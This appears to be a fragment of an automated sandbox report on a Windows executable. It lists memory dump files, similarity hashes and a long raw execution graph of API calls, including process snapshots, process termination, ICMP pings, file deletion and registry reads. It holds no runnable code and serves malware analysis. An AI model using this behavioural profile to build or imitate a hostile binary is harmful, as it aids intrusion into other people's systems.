• CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
• lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
• Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8
Uniqueness
• Uniqueness Score: -1.00%
Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 111

[Execution graph: rendered in the original report as a node/edge figure (node addresses such as 731033 and 7358df, edges such as 97032->97037, and the API calls resolved at each node). The graph data itself is not reproduced here; the Windows APIs that appear on its nodes are: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, RaiseException, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, DestroyIcon, LoadStringW, GetFullPathNameW, GetModuleFileNameW, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObjectEx, SetEvent and ResetEvent, with CRT helpers (__onexit, __fread_nolock, _wcslen, __wsopen_s, ___scrt_fastfail, __Init_thread_footer, _strftime). The listing is truncated at the end of this page.]
742d3f 97428 787c78 97427->97428 97429 742d4c 97427->97429 97652 7b61a2 53 API calls _wcslen 97428->97652 97431 743160 9 API calls 97429->97431 97432 742d59 97431->97432 97436 743160 9 API calls 97432->97436 97443 742dd7 messages 97432->97443 97433 75014b 8 API calls 97433->97442 97434 75017b 8 API calls 97434->97442 97435 743082 97648 74fe39 8 API calls 97435->97648 97441 742d73 97436->97441 97438 742f2d 97438->97400 97441->97443 97449 73bed9 8 API calls 97441->97449 97442->97422 97442->97425 97442->97427 97442->97433 97442->97434 97442->97443 97444 787c59 97442->97444 97477 740340 97442->97477 97443->97435 97445 743160 9 API calls 97443->97445 97448 742e8b messages 97443->97448 97500 7b0fb8 97443->97500 97525 74ac3e 97443->97525 97544 7af94a 97443->97544 97553 7a669f 97443->97553 97558 7b9fe8 97443->97558 97561 7ad653 97443->97561 97581 7a664c 97443->97581 97588 7ba5b2 97443->97588 97594 7c33a3 97443->97594 97599 7bad47 97443->97599 97653 7a3fe1 81 API calls __wsopen_s 97443->97653 97651 7a3fe1 81 API calls __wsopen_s 97444->97651 97445->97443 97448->97438 97604 74e322 97448->97604 97449->97443 97460->97400 97461->97400 97462->97394 97463->97399 97464->97394 97465->97394 97466->97394 97468 7431a1 97467->97468 97469 74317d 97467->97469 97654 7505b2 5 API calls __Init_thread_wait 97468->97654 97476 742bb0 97469->97476 97656 7505b2 5 API calls __Init_thread_wait 97469->97656 97472 7431ab 97472->97469 97655 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97472->97655 97473 749f47 97473->97476 97657 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97473->97657 97476->97412 97495 740376 messages 97477->97495 97478 750413 29 API calls pre_c_initialization 97478->97495 97479 78632b 97663 7a3fe1 81 API calls __wsopen_s 97479->97663 97481 741695 97486 73bed9 8 API calls 97481->97486 97494 74049d messages 97481->97494 97483 75014b 8 API calls 97483->97495 97484 785cdb 97492 73bed9 8 API calls 97484->97492 97484->97494 97485 78625a 
97662 7a3fe1 81 API calls __wsopen_s 97485->97662 97486->97494 97489 73bed9 8 API calls 97489->97495 97490 7505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97490->97495 97492->97494 97493 73bf73 8 API calls 97493->97495 97494->97442 97495->97478 97495->97479 97495->97481 97495->97483 97495->97484 97495->97485 97495->97489 97495->97490 97495->97493 97495->97494 97496 786115 97495->97496 97497 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97495->97497 97499 740aae messages 97495->97499 97658 741990 280 API calls 2 library calls 97495->97658 97659 741e50 40 API calls messages 97495->97659 97660 7a3fe1 81 API calls __wsopen_s 97496->97660 97497->97495 97661 7a3fe1 81 API calls __wsopen_s 97499->97661 97501 7b0fe1 97500->97501 97502 7b100f WSAStartup 97501->97502 97700 73c98d 39 API calls 97501->97700 97503 7b1054 97502->97503 97524 7b1023 messages 97502->97524 97664 74c1f6 97503->97664 97506 7b0ffc 97506->97502 97701 73c98d 39 API calls 97506->97701 97511 7b100b 97511->97502 97513 7b1075 inet_addr gethostbyname 97514 7b1093 IcmpCreateFile 97513->97514 97513->97524 97515 7b10d3 97514->97515 97514->97524 97516 75017b 8 API calls 97515->97516 97517 7b10ec 97516->97517 97518 73423c 8 API calls 97517->97518 97519 7b10f7 97518->97519 97520 7b112b IcmpSendEcho 97519->97520 97521 7b1102 IcmpSendEcho 97519->97521 97523 7b114c 97520->97523 97521->97523 97522 7b1212 IcmpCloseHandle WSACleanup 97522->97524 97523->97522 97524->97443 97526 738ec0 52 API calls 97525->97526 97527 74ac68 97526->97527 97708 74bc58 97527->97708 97529 74ac7f 97540 74b09b _wcslen 97529->97540 97713 73c98d 39 API calls 97529->97713 97531 74bbbe 43 API calls 97531->97540 97533 737ad5 8 API calls 97533->97540 97535 736c03 8 API calls 97535->97540 97537 73c98d 39 API calls 97537->97540 97538 74b1fb 97538->97443 97539 738ec0 52 API calls 97539->97540 97540->97531 97540->97533 97540->97535 97540->97537 
97540->97538 97540->97539 97541 738577 8 API calls 97540->97541 97542 73396b 60 API calls 97540->97542 97543 733907 Shell_NotifyIconW 97540->97543 97714 754d98 97540->97714 97724 73ad40 8 API calls __fread_nolock 97540->97724 97725 737b1a 8 API calls 97540->97725 97541->97540 97542->97540 97543->97540 97545 75017b 8 API calls 97544->97545 97546 7af95b 97545->97546 97547 73423c 8 API calls 97546->97547 97548 7af965 97547->97548 97549 738ec0 52 API calls 97548->97549 97550 7af97c GetEnvironmentVariableW 97549->97550 97729 7a160f 8 API calls 97550->97729 97552 7af999 messages 97552->97443 97554 738ec0 52 API calls 97553->97554 97555 7a66b2 97554->97555 97730 79e472 lstrlenW 97555->97730 97557 7a66bc 97557->97443 97735 7b89b6 97558->97735 97560 7b9ff8 97560->97443 97562 7ad678 97561->97562 97563 7ad66d 97561->97563 97565 738ec0 52 API calls 97562->97565 97865 73c98d 39 API calls 97563->97865 97566 7ad68a 97565->97566 97860 7ac783 97566->97860 97582 738ec0 52 API calls 97581->97582 97583 7a6662 97582->97583 97866 79dc54 97583->97866 97585 7a666a 97586 7a666e GetLastError 97585->97586 97587 7a6683 97585->97587 97586->97587 97587->97443 97590 7ba5c5 97588->97590 97589 738ec0 52 API calls 97591 7ba632 97589->97591 97590->97589 97593 7ba5d4 97590->97593 97940 7a18a9 97591->97940 97593->97443 97981 7c35cc 97594->97981 97596 7c33b1 97597 73b4c8 8 API calls 97596->97597 97598 7c33f9 97597->97598 97598->97443 97600 738ec0 52 API calls 97599->97600 97601 7bad63 97600->97601 97998 79dd87 CreateToolhelp32Snapshot Process32FirstW 97601->97998 97603 7bad72 97603->97443 97605 74e32a 97604->97605 97606 74e34e 97605->97606 97607 73c760 8 API calls 97605->97607 97606->97448 97608 74e335 messages 97607->97608 97608->97448 97610 7b7b38 97609->97610 97611 7b7b52 97609->97611 98066 7a3fe1 81 API calls __wsopen_s 97610->98066 98055 7b60e6 97611->98055 97615 740340 279 API calls 97616 7b7bc1 97615->97616 97617 7b7c5c 97616->97617 97620 7b7c03 97616->97620 97640 7b7b4a 97616->97640 97618 
7b7c62 97617->97618 97619 7b7cb0 97617->97619 98067 7a1ad8 8 API calls 97618->98067 97621 738ec0 52 API calls 97619->97621 97619->97640 97624 7a148b 8 API calls 97620->97624 97622 7b7cc2 97621->97622 97625 73c2c9 8 API calls 97622->97625 97627 7b7c3b 97624->97627 97628 7b7ce6 CharUpperBuffW 97625->97628 97626 7b7c85 98068 73bd07 8 API calls 97626->98068 97630 742b20 279 API calls 97627->97630 97631 7b7d00 97628->97631 97630->97640 97632 7b7d53 97631->97632 97633 7b7d07 97631->97633 97634 738ec0 52 API calls 97632->97634 98062 7a148b 97633->98062 97635 7b7d5b 97634->97635 98069 74aa65 9 API calls 97635->98069 97639 742b20 279 API calls 97639->97640 97640->97410 97641 7b7d65 97641->97640 97642 738ec0 52 API calls 97641->97642 97643 7b7d80 97642->97643 98070 73bd07 8 API calls 97643->98070 97645->97408 97646->97417 97647->97435 97648->97435 97649->97443 97650->97443 97651->97443 97652->97441 97653->97443 97654->97472 97655->97469 97656->97473 97657->97476 97658->97495 97659->97495 97660->97499 97661->97494 97662->97494 97663->97494 97665 75017b 8 API calls 97664->97665 97666 74c209 97665->97666 97667 75014b 8 API calls 97666->97667 97668 74c215 97667->97668 97669 738ec0 97668->97669 97670 738ed2 97669->97670 97671 738ed5 97669->97671 97692 74f9d4 WideCharToMultiByte 97670->97692 97672 738f0b 97671->97672 97673 738edd 97671->97673 97674 776b1f 97672->97674 97677 738f1d 97672->97677 97684 776a38 97672->97684 97702 755536 26 API calls 97673->97702 97705 7554f3 26 API calls 97674->97705 97703 74fe6f 51 API calls 97677->97703 97678 738eed 97681 75014b 8 API calls 97678->97681 97679 776b37 97679->97679 97683 738ef7 97681->97683 97685 73b329 8 API calls 97683->97685 97686 75017b 8 API calls 97684->97686 97691 776ab1 97684->97691 97685->97670 97687 776a81 97686->97687 97688 75014b 8 API calls 97687->97688 97689 776aa8 97688->97689 97690 73b329 8 API calls 97689->97690 97690->97691 97704 74fe6f 51 API calls 97691->97704 97693 74fa35 97692->97693 97694 74f9fe 97692->97694 97707 
74fe8a 8 API calls 97693->97707 97695 75017b 8 API calls 97694->97695 97697 74fa05 WideCharToMultiByte 97695->97697 97706 74fa3e 8 API calls __fread_nolock 97697->97706 97699 74fa29 97699->97513 97700->97506 97701->97511 97702->97678 97703->97678 97704->97674 97705->97679 97706->97699 97707->97699 97709 75014b 8 API calls 97708->97709 97710 74bc65 97709->97710 97711 73b329 8 API calls 97710->97711 97712 74bc70 97711->97712 97712->97529 97713->97540 97715 754da6 97714->97715 97716 754e1b 97714->97716 97723 754dcb 97715->97723 97726 75f649 20 API calls _free 97715->97726 97728 754e2d 40 API calls 2 library calls 97716->97728 97719 754e28 97719->97540 97720 754db2 97727 762b5c 26 API calls _strftime 97720->97727 97722 754dbd 97722->97540 97723->97540 97724->97540 97725->97540 97726->97720 97727->97722 97728->97719 97729->97552 97731 79e4ba 97730->97731 97732 79e490 GetFileAttributesW 97730->97732 97731->97557 97732->97731 97733 79e49c FindFirstFileW 97732->97733 97733->97731 97734 79e4ad FindClose 97733->97734 97734->97731 97736 738ec0 52 API calls 97735->97736 97737 7b89ed 97736->97737 97759 7b8a32 messages 97737->97759 97773 7b9730 97737->97773 97739 7b8cde 97740 7b8eac 97739->97740 97744 7b8cec 97739->97744 97822 7b9941 59 API calls 97740->97822 97743 7b8ebb 97743->97744 97745 7b8ec7 97743->97745 97786 7b88e3 97744->97786 97745->97759 97746 738ec0 52 API calls 97764 7b8aa6 97746->97764 97751 7b8d25 97800 74ffe0 97751->97800 97754 7b8d5f 97808 737e12 97754->97808 97755 7b8d45 97807 7a3fe1 81 API calls __wsopen_s 97755->97807 97758 7b8d50 GetCurrentProcess TerminateProcess 97758->97754 97759->97560 97762 7b8d87 97771 7b8daf 97762->97771 97819 741ca0 8 API calls 97762->97819 97764->97739 97764->97746 97764->97759 97805 794ad3 8 API calls __fread_nolock 97764->97805 97806 7b8f7a 41 API calls _strftime 97764->97806 97765 7b8f22 97765->97759 97767 7b8f36 FreeLibrary 97765->97767 97766 7b8d9e 97820 7b95d8 74 API calls 97766->97820 97767->97759 97771->97765 97772 73b4c8 8 
API calls 97771->97772 97821 741ca0 8 API calls 97771->97821 97823 7b95d8 74 API calls 97771->97823 97772->97771 97774 73c2c9 8 API calls 97773->97774 97775 7b974b CharLowerBuffW 97774->97775 97824 799805 97775->97824 97779 73bf73 8 API calls 97780 7b9787 97779->97780 97831 73acc0 97780->97831 97782 7b979b 97783 73adf4 8 API calls 97782->97783 97785 7b97a5 _wcslen 97783->97785 97784 7b98bb _wcslen 97784->97764 97785->97784 97843 7b8f7a 41 API calls _strftime 97785->97843 97787 7b88fe 97786->97787 97791 7b8949 97786->97791 97788 75017b 8 API calls 97787->97788 97789 7b8920 97788->97789 97790 75014b 8 API calls 97789->97790 97789->97791 97790->97789 97792 7b9af3 97791->97792 97793 7b9d08 messages 97792->97793 97798 7b9b17 _strcat _wcslen ___std_exception_copy 97792->97798 97793->97751 97794 73c98d 39 API calls 97794->97798 97795 73c63f 39 API calls 97795->97798 97796 73ca5b 39 API calls 97796->97798 97797 738ec0 52 API calls 97797->97798 97798->97793 97798->97794 97798->97795 97798->97796 97798->97797 97847 79f8c5 10 API calls _wcslen 97798->97847 97801 74fff5 97800->97801 97802 75008d CreateToolhelp32Snapshot 97801->97802 97803 75007b FindCloseChangeNotification 97801->97803 97804 75005b 97801->97804 97802->97804 97803->97804 97804->97754 97804->97755 97805->97764 97806->97764 97807->97758 97809 737e1a 97808->97809 97810 75014b 8 API calls 97809->97810 97811 737e28 97810->97811 97848 738445 97811->97848 97814 738470 97851 73c760 97814->97851 97816 738480 97817 75017b 8 API calls 97816->97817 97818 73851c 97816->97818 97817->97818 97818->97762 97819->97766 97820->97771 97821->97771 97822->97743 97823->97771 97825 799825 _wcslen 97824->97825 97827 799919 97825->97827 97829 79985a 97825->97829 97830 799914 97825->97830 97827->97830 97845 74e36b 41 API calls 97827->97845 97829->97830 97844 74e36b 41 API calls 97829->97844 97830->97779 97830->97785 97832 73accf 97831->97832 97834 73ace1 97831->97834 97833 73c2c9 8 API calls 97832->97833 97841 73acda __fread_nolock 
97832->97841 97835 7805a3 __fread_nolock 97833->97835 97834->97832 97836 73ad07 97834->97836 97837 780557 97834->97837 97846 7388e8 8 API calls 97836->97846 97838 75014b 8 API calls 97837->97838 97840 780561 97838->97840 97842 75017b 8 API calls 97840->97842 97841->97782 97842->97832 97843->97784 97844->97829 97845->97827 97846->97841 97847->97798 97849 75014b 8 API calls 97848->97849 97850 737e30 97849->97850 97850->97814 97852 73c76b 97851->97852 97853 781285 97852->97853 97858 73c773 messages 97852->97858 97855 75014b 8 API calls 97853->97855 97854 73c77a 97854->97816 97856 781291 97855->97856 97858->97854 97859 73c7e0 8 API calls messages 97858->97859 97859->97858 97861 73b329 8 API calls 97860->97861 97862 7ac7ae 97861->97862 97863 73b329 8 API calls 97862->97863 97864 7ac7b9 97863->97864 97865->97562 97867 73bf73 8 API calls 97866->97867 97868 79dc73 97867->97868 97869 73bf73 8 API calls 97868->97869 97870 79dc7c 97869->97870 97871 73bf73 8 API calls 97870->97871 97872 79dc85 97871->97872 97873 735851 9 API calls 97872->97873 97874 79dc90 97873->97874 97891 79eab0 GetFileAttributesW 97874->97891 97877 79dcab 97893 73568e 97877->97893 97878 736b7c 8 API calls 97878->97877 97880 79dcbf FindFirstFileW 97881 79dd4b FindClose 97880->97881 97882 79dcde 97880->97882 97888 79dd56 97881->97888 97882->97881 97885 79dce2 97882->97885 97883 79dd26 FindNextFileW 97883->97882 97883->97885 97884 73bed9 8 API calls 97884->97885 97885->97882 97885->97883 97885->97884 97887 736b7c 8 API calls 97885->97887 97935 737bb5 8 API calls 97885->97935 97889 79dd17 DeleteFileW 97887->97889 97888->97585 97889->97883 97890 79dd42 FindClose 97889->97890 97890->97888 97892 79dc99 97891->97892 97892->97877 97892->97878 97894 73bf73 8 API calls 97893->97894 97895 7356a4 97894->97895 97896 73bf73 8 API calls 97895->97896 97897 7356ac 97896->97897 97898 73bf73 8 API calls 97897->97898 97899 7356b4 97898->97899 97900 73bf73 8 API calls 97899->97900 97901 7356bc 97900->97901 97902 7356f0 
97901->97902 97903 774da1 97901->97903 97905 73acc0 8 API calls 97902->97905 97904 73bed9 8 API calls 97903->97904 97906 774daa 97904->97906 97907 7356fe 97905->97907 97908 73bd57 8 API calls 97906->97908 97909 73adf4 8 API calls 97907->97909 97910 735733 97908->97910 97911 735708 97909->97911 97916 735754 97910->97916 97925 774dcc 97910->97925 97928 735778 97910->97928 97911->97910 97912 73acc0 8 API calls 97911->97912 97914 735729 97912->97914 97913 73acc0 8 API calls 97917 735789 97913->97917 97915 73adf4 8 API calls 97914->97915 97915->97910 97916->97928 97936 73655e 97916->97936 97919 73579f 97917->97919 97923 73bed9 8 API calls 97917->97923 97920 7357b3 97919->97920 97926 73bed9 8 API calls 97919->97926 97924 7357be 97920->97924 97929 73bed9 8 API calls 97920->97929 97921 735761 97927 73acc0 8 API calls 97921->97927 97921->97928 97922 738577 8 API calls 97932 774e8c 97922->97932 97923->97919 97930 73bed9 8 API calls 97924->97930 97933 7357c9 97924->97933 97925->97922 97926->97920 97927->97928 97928->97913 97929->97924 97930->97933 97931 73655e 8 API calls 97931->97932 97932->97928 97932->97931 97939 73ad40 8 API calls __fread_nolock 97932->97939 97933->97880 97935->97885 97937 73c2c9 8 API calls 97936->97937 97938 736569 97937->97938 97938->97921 97939->97932 97941 7a18b6 97940->97941 97942 75014b 8 API calls 97941->97942 97943 7a18bd 97942->97943 97946 79fcb5 97943->97946 97945 7a18f7 97945->97593 97947 73c2c9 8 API calls 97946->97947 97948 79fcc8 CharLowerBuffW 97947->97948 97951 79fcdb 97948->97951 97949 73655e 8 API calls 97949->97951 97950 79fd19 97952 79fd2b 97950->97952 97953 73655e 8 API calls 97950->97953 97951->97949 97951->97950 97963 79fce5 ___scrt_fastfail 97951->97963 97954 75017b 8 API calls 97952->97954 97953->97952 97958 79fd59 97954->97958 97955 79fd7b 97964 79fe0c 97955->97964 97958->97955 97979 79fbed 8 API calls 97958->97979 97959 79fdb8 97960 75014b 8 API calls 97959->97960 97959->97963 97961 79fdd2 97960->97961 97962 75017b 8 API calls 
97961->97962 97962->97963 97963->97945 97965 73bf73 8 API calls 97964->97965 97966 79fe3e 97965->97966 97967 73bf73 8 API calls 97966->97967 97968 79fe47 97967->97968 97969 73bf73 8 API calls 97968->97969 97973 79fe50 97969->97973 97970 738577 8 API calls 97970->97973 97971 7a0114 97971->97959 97972 7566f8 GetStringTypeW 97972->97973 97973->97970 97973->97971 97973->97972 97975 756641 39 API calls 97973->97975 97976 79fe0c 40 API calls 97973->97976 97977 73ad40 8 API calls 97973->97977 97978 73bed9 8 API calls 97973->97978 97980 756722 GetStringTypeW _strftime 97973->97980 97975->97973 97976->97973 97977->97973 97978->97973 97979->97958 97980->97973 97987 7c3574 97981->97987 97984 7c35ed timeGetTime 97984->97596 97988 73b4c8 8 API calls 97987->97988 97989 7c358f 97988->97989 97990 7c35b9 97989->97990 97991 7c359b 97989->97991 97992 738577 8 API calls 97990->97992 97993 738ec0 52 API calls 97991->97993 97995 7c35b7 97992->97995 97994 7c35a8 97993->97994 97994->97995 97996 73bed9 8 API calls 97994->97996 97995->97984 97997 73c98d 39 API calls 97995->97997 97996->97995 97997->97984 98008 79e80e 97998->98008 98000 79ddd4 Process32NextW 98001 79de86 FindCloseChangeNotification 98000->98001 98006 79ddcd 98000->98006 98001->97603 98002 73bf73 8 API calls 98002->98006 98003 73b329 8 API calls 98003->98006 98004 73568e 8 API calls 98004->98006 98006->98000 98006->98001 98006->98002 98006->98003 98006->98004 98014 737bb5 8 API calls 98006->98014 98015 74e36b 41 API calls 98006->98015 98009 79e819 98008->98009 98010 79e830 98009->98010 98013 79e836 98009->98013 98016 756722 GetStringTypeW _strftime 98009->98016 98017 75666b 98010->98017 98013->98006 98014->98006 98015->98006 98016->98009 98018 756684 _strftime 98017->98018 98021 755f80 98018->98021 98039 7565c9 98021->98039 98023 755fd7 98048 754d15 38 API calls 2 library calls 98023->98048 98024 755f93 98024->98023 98025 755faa 98024->98025 98038 755fba 98024->98038 98046 75f649 20 API calls _free 98025->98046 98028 755faf 
98047 762b5c 26 API calls _strftime 98028->98047 98031 755fe2 98032 75600b 98031->98032 98049 763a62 GetStringTypeW 98031->98049 98033 756215 __aulldvrm 98032->98033 98050 75659d 26 API calls 2 library calls 98032->98050 98051 75659d 26 API calls 2 library calls 98033->98051 98036 7564f6 98036->98038 98052 75f649 20 API calls _free 98036->98052 98038->98013 98040 7565e1 98039->98040 98041 7565ce 98039->98041 98040->98024 98053 75f649 20 API calls _free 98041->98053 98043 7565d3 98054 762b5c 26 API calls _strftime 98043->98054 98045 7565de 98045->98024 98046->98028 98047->98038 98048->98031 98049->98031 98050->98033 98051->98036 98052->98038 98053->98043 98054->98045 98056 7b6101 98055->98056 98057 7b614f 98055->98057 98058 75017b 8 API calls 98056->98058 98057->97615 98060 7b6123 98058->98060 98059 75014b 8 API calls 98059->98060 98060->98057 98060->98059 98071 7a1400 8 API calls 98060->98071 98063 7a1499 98062->98063 98065 7a14d2 98062->98065 98064 75014b 8 API calls 98063->98064 98063->98065 98064->98065 98065->97639 98066->97640 98067->97626 98068->97640 98069->97641 98070->97640 98071->98060 98072 731098 98077 735fc8 98072->98077 98076 7310a7 98078 73bf73 8 API calls 98077->98078 98079 735fdf GetVersionExW 98078->98079 98080 738577 8 API calls 98079->98080 98081 73602c 98080->98081 98082 73adf4 8 API calls 98081->98082 98086 736062 98081->98086 98083 736056 98082->98083 98085 7355dc 8 API calls 98083->98085 98084 73611c GetCurrentProcess IsWow64Process 98087 736138 98084->98087 98085->98086 98086->98084 98092 775224 98086->98092 98088 736150 LoadLibraryA 98087->98088 98089 775269 GetSystemInfo 98087->98089 98090 736161 GetProcAddress 98088->98090 98091 73619d GetSystemInfo 98088->98091 98090->98091 98093 736171 GetNativeSystemInfo 98090->98093 98094 736177 98091->98094 98093->98094 98095 73109d 98094->98095 98096 73617b FreeLibrary 98094->98096 98097 750413 29 API calls __onexit 98095->98097 98096->98095 98097->98076 98098 79f292 98099 79f29f 98098->98099 98100 
79f310 98098->98100 98101 79f2a1 Sleep 98099->98101 98103 79f2aa QueryPerformanceCounter 98099->98103 98101->98100 98103->98101 98104 79f2b8 QueryPerformanceFrequency 98103->98104 98105 79f2c2 Sleep QueryPerformanceCounter 98104->98105 98106 79f303 98105->98106 98106->98105 98107 79f307 98106->98107 98107->98100 98108 76947a 98109 769487 98108->98109 98113 76949f 98108->98113 98165 75f649 20 API calls _free 98109->98165 98111 76948c 98166 762b5c 26 API calls _strftime 98111->98166 98112 769497 98113->98112 98115 7694fa 98113->98115 98167 770144 21 API calls 2 library calls 98113->98167 98128 75dcc5 98115->98128 98118 769512 98135 768fb2 98118->98135 98120 769519 98120->98112 98121 75dcc5 __fread_nolock 26 API calls 98120->98121 98122 769545 98121->98122 98122->98112 98123 75dcc5 __fread_nolock 26 API calls 98122->98123 98124 769553 98123->98124 98124->98112 98125 75dcc5 __fread_nolock 26 API calls 98124->98125 98126 769563 98125->98126 98127 75dcc5 __fread_nolock 26 API calls 98126->98127 98127->98112 98129 75dce6 98128->98129 98130 75dcd1 98128->98130 98129->98118 98168 75f649 20 API calls _free 98130->98168 98132 75dcd6 98169 762b5c 26 API calls _strftime 98132->98169 98134 75dce1 98134->98118 98136 768fbe ___BuildCatchObject 98135->98136 98137 768fc6 98136->98137 98138 768fde 98136->98138 98236 75f636 20 API calls _free 98137->98236 98139 7690a4 98138->98139 98144 769017 98138->98144 98243 75f636 20 API calls _free 98139->98243 98141 768fcb 98237 75f649 20 API calls _free 98141->98237 98147 769026 98144->98147 98148 76903b 98144->98148 98145 7690a9 98244 75f649 20 API calls _free 98145->98244 98146 768fd3 __fread_nolock 98146->98120 98238 75f636 20 API calls _free 98147->98238 98170 7654ba EnterCriticalSection 98148->98170 98152 76902b 98239 75f649 20 API calls _free 98152->98239 98153 769041 98156 769072 98153->98156 98157 76905d 98153->98157 98171 7690c5 98156->98171 98240 75f649 20 API calls _free 98157->98240 98160 769033 98245 762b5c 26 API calls _strftime 
98160->98245 98161 769062 98241 75f636 20 API calls _free 98161->98241 98162 76906d 98242 76909c LeaveCriticalSection __wsopen_s 98162->98242 98165->98111 98166->98112 98167->98115 98168->98132 98169->98134 98170->98153 98172 7690d7 98171->98172 98173 7690ef 98171->98173 98262 75f636 20 API calls _free 98172->98262 98175 769459 98173->98175 98180 769134 98173->98180 98285 75f636 20 API calls _free 98175->98285 98176 7690dc 98263 75f649 20 API calls _free 98176->98263 98179 76945e 98286 75f649 20 API calls _free 98179->98286 98181 7690e4 98180->98181 98183 76913f 98180->98183 98188 76916f 98180->98188 98181->98162 98264 75f636 20 API calls _free 98183->98264 98184 76914c 98287 762b5c 26 API calls _strftime 98184->98287 98186 769144 98265 75f649 20 API calls _free 98186->98265 98190 769188 98188->98190 98191 7691ae 98188->98191 98192 7691ca 98188->98192 98190->98191 98224 769195 98190->98224 98266 75f636 20 API calls _free 98191->98266 98246 763b93 98192->98246 98195 7691b3 98267 75f649 20 API calls _free 98195->98267 98200 769333 98203 7693a9 98200->98203 98205 76934c GetConsoleMode 98200->98205 98201 7691ba 98268 762b5c 26 API calls _strftime 98201->98268 98202 7691ea 98206 762d38 _free 20 API calls 98202->98206 98207 7693ad ReadFile 98203->98207 98205->98203 98208 76935d 98205->98208 98209 7691f1 98206->98209 98210 7693c7 98207->98210 98211 769421 GetLastError 98207->98211 98208->98207 98212 769363 ReadConsoleW 98208->98212 98213 769216 98209->98213 98214 7691fb 98209->98214 98210->98211 98217 76939e 98210->98217 98215 769385 98211->98215 98216 76942e 98211->98216 98212->98217 98219 76937f GetLastError 98212->98219 98277 7697a4 98213->98277 98275 75f649 20 API calls _free 98214->98275 98233 7691c5 __fread_nolock 98215->98233 98280 75f613 20 API calls 2 library calls 98215->98280 98283 75f649 20 API calls _free 98216->98283 98228 769403 98217->98228 98229 7693ec 98217->98229 98217->98233 98219->98215 98220 762d38 _free 20 API calls 98220->98181 98223 769433 98284 
75f636 20 API calls _free 98223->98284 98253 76fc1b 98224->98253 98226 769200 98276 75f636 20 API calls _free 98226->98276 98232 76941a 98228->98232 98228->98233 98281 768de1 31 API calls 3 library calls 98229->98281 98282 768c21 29 API calls __fread_nolock 98232->98282 98233->98220 98235 76941f 98235->98233 98236->98141 98237->98146 98238->98152 98239->98160 98240->98161 98241->98162 98242->98146 98243->98145 98244->98160 98245->98146 98247 763bd1 98246->98247 98251 763ba1 CallUnexpected 98246->98251 98289 75f649 20 API calls _free 98247->98289 98248 763bbc RtlAllocateHeap 98250 763bcf 98248->98250 98248->98251 98269 762d38 98250->98269 98251->98247 98251->98248 98288 75521d 7 API calls 2 library calls 98251->98288 98254 76fc35 98253->98254 98255 76fc28 98253->98255 98258 76fc41 98254->98258 98291 75f649 20 API calls _free 98254->98291 98290 75f649 20 API calls _free 98255->98290 98258->98200 98259 76fc62 98292 762b5c 26 API calls _strftime 98259->98292 98260 76fc2d 98260->98200 98262->98176 98263->98181 98264->98186 98265->98184 98266->98195 98267->98201 98268->98233 98270 762d43 RtlFreeHeap 98269->98270 98271 762d6c _free 98269->98271 98270->98271 98272 762d58 98270->98272 98271->98202 98293 75f649 20 API calls _free 98272->98293 98274 762d5e GetLastError 98274->98271 98275->98226 98276->98233 98294 76970b 98277->98294 98280->98233 98281->98233 98282->98235 98283->98223 98284->98233 98285->98179 98286->98184 98287->98181 98288->98251 98289->98250 98290->98260 98291->98259 98292->98260 98293->98274 98303 765737 98294->98303 98296 76971d 98297 769736 SetFilePointerEx 98296->98297 98298 769725 98296->98298 98300 76974e GetLastError 98297->98300 98302 76972a 98297->98302 98316 75f649 20 API calls _free 98298->98316 98317 75f613 20 API calls 2 library calls 98300->98317 98302->98224 98304 765744 98303->98304 98306 765759 98303->98306 98318 75f636 20 API calls _free 98304->98318 98311 76577e 98306->98311 98320 75f636 20 API calls _free 98306->98320 98307 765749 98319 

Control-flow Graph

• Executed
• Not Executed
